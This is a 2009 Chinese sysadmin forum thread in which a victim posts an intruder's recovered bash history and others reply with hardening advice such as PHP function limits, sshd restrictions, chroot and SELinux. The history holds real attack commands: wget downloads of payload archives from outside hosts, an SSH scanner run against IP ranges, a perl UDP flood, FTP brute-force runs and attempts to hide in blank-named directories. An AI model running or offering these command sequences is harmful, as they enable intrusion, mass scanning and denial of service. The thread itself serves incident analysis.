免费注册	查看新帖 \|


平台论坛博客文库

› 论坛 › IT运维 › 监控及自动化运维技术 › 服务器被人黑了，大家来评论看

最近访问板块

发新帖

查看: 3502 | 回复: 8

上一主题

下一主题

服务器被人黑了，大家来评论看 [复制链接]

论坛徽章:: 0

电梯直达

跳转到指定楼层

1楼 [收藏(0)] [报告]

发表于 2009-04-08 10:06 |只看该作者 |倒序浏览

web:/home/userbak# vim .bash_history

perl 84.122.186.0 0 0
cd
perl 84.122.186.0 0 0
cd
ls
cd ..
ls
cd user
perl.exe 84.122.186.0 0 0
perl 84.122.186.0 0 0
perl udp.pl 84.122.186.0 0 0
df -h
ls
ls ..
cd /tmp/
mkdir .ssh
cd .ssh
mkdir " "
cd " "
wget igotsluts.com/test/s.tgz
tar zxfv s.tgz
cd salma
./x 212.224 22
ps aux
cd /tmp/
mkdir .ssh
cd .ssh
ls
ls ?
cd salma
cd " "
mkdir " "
cd " "
cd salma
cd
ls
ls ?
cd
ls ?
ls
cd
mkdir /tmp
rm -rf /tmp/
ps aux
rm -rf /tmp/
mkdir /tmp
cd .ssh
rm -rf tmp
ls
ls ?
ls ..
cd ..
?
ls
cd user
ls
ls ?
cd /tmp/
mkdir /tmp/
mkdir " "
cd " "
wget igotsluts.com/test/s.tgz
tar zxfv s.tgz
cd salma
./x 94.75 22
ls
uname -a
ps -a
ps a
ps aux
ls
cd /tmp/
ls
cd .X11-unix/
ls
mkdir " "
cd " "
wget igotsluts.com/test/s.tgz
tar zxf s.tgz
ls
cd salma/
ls
./x
screen
./x 87.106 22
./x 83.221 22
w
passwd
ls
w
skill -KILL pts/2
w
skill -KILL pts/0
ls
ls -la
cat .bash_history
ls
ls
ls -la
cd " "
ls -la
cd salma/
ls
cat vuln.txt
w
ls
./x 210.3 22
ls
w
screen -r
cd ..
ls
rm -rf s.tgz
ls
cd ..
ls
/var/tmp
ls
cd /tmp
ls
cd /var/tmp
ls
ls -la
mkdir .oracle
wget igotsluts.com/test/s.tgz
tar zxvf s.tgz
ls
cd salma/
ls
wget www.bye.ro/screen
chmod +x *
ls
./screen -r
w
cd /var/tmp
ls
cd salma/
ls
nano x
vi xxl
chmod +x *
./x 210.3
./x 210.3 22
ls
rm -rf 210.3.ps.22 mfu.txt
./xxl
w
ls
cd /tmp
ls
ls -la
cd "
ls
cd " "
ls
ls -la
ls
cat vuln.txt
cd ..
ls
cd /home
ls
cd user/
ls
ls -la
cd /tmp ls -la
ls -la
cd /var/tmp
ls -la
cd .oracle/
ls
ls -la
cd ..
ls
w
rm -rf *
ls
cd ..
ls
rm -rf *
ls
wget www.bye.ro/fb.tar
tar xvf fb.tar
ls
rm -rf fb.tar
ls
rm -rf log
nano users
ls
./0-100 216
./200-255 216
cat log
ps ax
ls
./100-200 216
cat log
nano pass
cat log
cat log
nano users
cat log
cat log
ls
killal -9 ftp_scanner
killall -9 f
ls
killall -9 ftp_scanner
ps ax
ls
rm -rf log
./0-100 64
cat log

[ 本帖最后由 theanswer 于 2009-4-8 10:09 编辑 ]

文库|博客

论坛徽章:: 0

2楼 [报告]

发表于 2009-04-08 16:54 |只看该作者

从哪进去的？

实战分享：从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线！ | 新一代分布式关系型数据库RadonDB知多少？

论坛徽章:: 0

3楼 [报告]

发表于 2009-04-09 09:40 |只看该作者

囧的是也没找到从哪里进来的，没有得到root权限，

实战分享：从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线！ | 新一代分布式关系型数据库RadonDB知多少？

论坛徽章:: 0

4楼 [报告]

发表于 2009-04-13 13:55 |只看该作者

php.ini
disable_functions
safe_mode
sshd_config端口与IP限制
网站后台及重要目录IP限制

实战分享：从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线！ | 新一代分布式关系型数据库RadonDB知多少？

论坛徽章:: 0

5楼 [报告]

发表于 2009-04-15 07:21 |只看该作者

看不懂我的WIN2003经常被黑。。（

）

实战分享：从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线！ | 新一代分布式关系型数据库RadonDB知多少？

论坛徽章:: 0

6楼 [报告]

发表于 2009-06-13 11:57 |只看该作者

我可以帮你们解决服务器经常被黑的安全问题

实战分享：从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线！ | 新一代分布式关系型数据库RadonDB知多少？

论坛徽章:: 0

7楼 [报告]

发表于 2009-06-18 11:53 |只看该作者

回复 #6 myfreeke 的帖子

把你的经验共享一下咯

实战分享：从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线！ | 新一代分布式关系型数据库RadonDB知多少？

论坛徽章:: 5

技术图书徽章
日期:2014-02-10 10:55:18

技术图书徽章
日期:2014-03-17 16:37:45

狮子座
日期:2014-04-25 11:17:42

未羊
日期:2014-08-13 11:45:23

天蝎座
日期:2015-12-16 10:30:37

8楼 [报告]

发表于 2009-06-18 12:54 |只看该作者

看看chroot和selinux吧,web上的漏洞是防不住的

实战分享：从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线！ | 新一代分布式关系型数据库RadonDB知多少？

论坛徽章:: 0

9楼 [报告]

发表于 2009-06-18 23:37 |只看该作者

还是可以防的啦!

实战分享：从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线！ | 新一代分布式关系型数据库RadonDB知多少？

发新帖

Chinaunix › 论坛 › IT运维 › 监控及自动化运维技术 › 服务器被人黑了，大家来评论看

北京盛拓优讯信息技术有限公司. 版权所有京ICP备16024965号-6 北京市公安局海淀分局网监中心备案编号：11010802020122 niuxiaotong@pcpop.com 17352615567
未成年举报专区
中国互联网协会会员联系我们：huangweiwei@itpub.net
感谢所有关心和支持过ChinaUnix的朋友们转载本站内容请注明原作者名及出处

清除 Cookies - ChinaUnix - Archiver - WAP - TOP